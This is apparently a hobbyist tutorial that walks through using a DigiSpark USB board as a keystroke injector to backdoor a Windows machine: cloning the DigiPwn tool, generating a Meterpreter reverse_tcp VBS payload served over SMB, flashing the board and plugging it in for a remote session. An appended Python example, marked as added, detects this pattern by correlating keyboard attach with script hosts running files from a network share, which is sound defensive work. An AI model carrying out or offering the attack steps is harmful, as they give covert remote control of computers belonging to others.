DigiPwn

by zero0overflow in Circuits > Software


So what are we doing here?

DigiSpark is a small Arduino-based development board that can act as a USB HID keyboard. Today we use this device to backdoor a Windows operating system!

Supplies

Arduino IDE

A Windows machine

DigiSpark

Metasploit Framework

Python 2.7 (Note: you need Python 2.7; don't go for any other version)

impacket

Brain! It helps


Clone the DigiPwn Repository!

Clone the DigiPwn GitHub repository with

git clone https://www.github.com/zer0overflow/DigiPwn

Now change into the DigiPwn directory with

cd DigiPwn/

Install Impacket [Modules Required by Python]

This module is required to run the SMB server, which is required for the payload library.

sudo apt-get install python-impacket

Or you can download the impacket library and install it from here.

Let's Generate the Payload!

Run

python DigiPwn.py [HOST] [PORT] [PAYLOAD] [OUTPUT FILE] [format]

For example:

python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs

You will now be asked whether to start the stager and SMB server. Press y and hit Enter.

Now Upload the Code to Arduino!

Before we upload, we need to make sure that the DigiSpark board is installed in the Arduino IDE; to do that, look here.

After that, upload the keystroke_inject.ino file generated by the script. Once done you are ready to

Time to Plug in the Baby!

Plug in your DigiSpark now and wait for 10 seconds.

BOOM! There's a Meterpreter session opened!
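
For defenders, the sequence above leaves a correlatable trail: a new USB keyboard enumerates, and within seconds a script host runs a file from a remote share. The detection logic below is an added example, not part of DigiPwn or the original post. The event layout, field names, share name and 30-second window are constructed assumptions, as is the premise that the generated .vbs is launched from the SMB server by UNC path.

```python
import re
from datetime import datetime

# Script hosts worth watching when they run content from a remote share.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
UNC_PATH = re.compile(r"\\\\[\w.-]+\\\S+")  # \\server\share\file

# Constructed sample telemetry (not real logs); layout and field names are assumptions.
EVENTS = [
    {"time": "2019-08-25T14:14:40", "host": "WS01", "type": "hid_keyboard_attached"},
    {"time": "2019-08-25T14:14:51", "host": "WS01", "type": "process_start",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\192.168.1.2\SHARE\win.vbs"},
    # Logon script from a file server with no keyboard attach beforehand: not flagged.
    {"time": "2019-08-25T15:02:10", "host": "WS02", "type": "process_start",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\fileserver\logon\map.vbs"},
    # Keyboard attach followed by an ordinary local program: not flagged.
    {"time": "2019-08-25T16:00:00", "host": "WS03", "type": "hid_keyboard_attached"},
    {"time": "2019-08-25T16:00:05", "host": "WS03", "type": "process_start",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

def correlate(events, window_s=30):
    """Flag script hosts started from a UNC path within window_s seconds
    after a keyboard attach on the same host. window_s is an assumed value."""
    last_attach, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["type"] == "hid_keyboard_attached":
            last_attach[ev["host"]] = ts
            continue
        if ev["type"] != "process_start":
            continue
        attach = last_attach.get(ev["host"])
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if (attach is not None and image in SCRIPT_HOSTS
                and UNC_PATH.search(ev["cmdline"])
                and (ts - attach).total_seconds() <= window_s):
            alerts.append({"host": ev["host"], "cmdline": ev["cmdline"],
                           "delay_s": int((ts - attach).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Only WS01 is flagged; the legitimate logon script on WS02 and the keyboard attach on WS03 pass because neither shows both halves of the pattern.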